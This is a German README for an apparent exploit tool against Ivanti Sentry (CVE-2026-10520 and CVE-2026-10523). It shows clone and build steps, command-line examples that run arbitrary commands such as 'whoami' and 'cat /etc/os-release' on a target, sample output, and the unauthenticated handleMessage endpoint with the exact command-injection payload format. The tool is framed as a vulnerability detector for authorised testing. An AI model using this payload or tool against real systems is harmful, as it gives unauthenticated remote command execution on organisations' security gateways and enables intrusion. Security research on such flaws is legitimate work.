
CVE-2026-10520 - CVE-2026-10523 - Ivanti Sentry
Ein umfassendes Proof-of-Concept-Erkennungstool zum Testen von Ivanti-Sentry-Schwachstellen im Zusammenhang mit Authentifizierungsumgehung und Remote-Codeausführung. Dieses Tool identifiziert Systeme, die anfällig für CVE-2026-10520 und CVE-2026-10523 sind.
Dieses Projekt dient dazu, zu erkennen und zu bestätigen, ob eine Ivanti-Sentry-Instanz anfällig für kritische Authentifizierungsumgehungs- und Remote-Codeausführungsfehler ist. Das Tool sendet speziell präparierte Nachrichten über den Ivanti-Sentry-API-Endpunkt, um Systembefehle auszuführen und die Ergebnisse zu extrahieren, sodass Sicherheitsforscher und Penetrationstester verwundbare Bereitstellungen identifizieren können.
Authentifizierungsumgehungs-Schwachstelle in Ivanti Sentry, die nicht authentifizierten Zugriff auf eingeschränkte API-Endpunkte ermöglicht.
Remote-Codeausführungs-Schwachstelle in Ivanti Sentry, die die Ausführung beliebiger Systembefehle über die Messaging-API in Kombination mit der Authentifizierungsumgehung erlaubt.
Klonen Sie das Repository und wechseln Sie in das Projektverzeichnis:
git clone https://github.com/gagaltotal/CVE-2026-10523-Ivanti-sentry
cd CVE-2026-10523-Ivanti-sentry
Initialisierung und Paketbibliothek abrufen
go mod init CVE-2026-10523-Ivanti-sentry
go mod tidy
Erstellen Sie die ausführbare Datei:
go build -o tot_poc tot_poc.go

Das Tool erfordert zwei obligatorische Parameter: Ziel-URL und auszuführenden Befehl.

Führen Sie einen einfachen Befehl auf dem Ziel aus:
./tot_poc -url https://target.example.com:8443 -cmd "uname -a"
-url (erforderlich): Basis-URL des Ziels inklusive Protokoll (z. B. https://127.0.0.1:8443)-cmd (erforderlich): Auszuführender Befehl zur Schwachstellenerkennung (z. B. "uname -a", "id", "whoami")-p oder -proxy (optional): Proxy-Adresse und Port für die Weiterleitung des Datenverkehrs (z. B. 127.0.0.1:8080)
Schwachstelle mit einfachem Systeminformationsbefehl erkennen:
./tot_poc -url https://192.168.1.100:8443 -cmd "uname -a"
Mit Proxy-Konfiguration ausführen:
./tot_poc -url https://target.example.com:8443 -cmd "whoami" -proxy 127.0.0.1:8080
Befehl zum Extrahieren von Systeminformationen ausführen:
./tot_poc -url https://sentry-instance.internal:8443 -cmd "cat /etc/os-release"
Das Tool zeigt an:
Target: https://192.168.1.100:8443
Command: uname -a
[+] Sending command execution check to: https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
[+] Target appears to be vulnerable.
Command output:
Linux sentry-server 5.10.0-8-generic x86_64 GNU/Linux
Target: https://192.168.1.100:8443
Command: uname -a
[+] Sending command execution check to: https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
[-] Target does not appear to be vulnerable.
Das Tool nutzt den Endpunkt /mics/api/v2/sentry/mics-config/handleMessage, der ohne Authentifizierung zugänglich ist. Der Payload wird wie folgt aufgebaut:
message=execute+system+/configuration/system/commandexec+<commandexec><index>1</index><reqandres>[COMMAND]</reqandres></commandexec>
Die Antwort enthält die Befehlsausgabe im XML-Format innerhalb eines success-Tags.
Dieses Tool wird ausschließlich für autorisierte Sicherheitstests und Forschungszwecke bereitgestellt. Die Nutzer sind allein dafür verantwortlich, sicherzustellen, dass sie vor dem Testen von Systemen über die entsprechende Autorisierung verfügen. Unbefugter Zugriff auf Computersysteme ist illegal. Die Autoren übernehmen keine Haftung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.
GhostGTR666 - Gagaltotal666
https://github.com/gagaltotal/CVE-2026-10523-Ivanti-sentry
Dieses Projekt wird wie besehen für Sicherheitsforschung und Bildungszwecke bereitgestellt.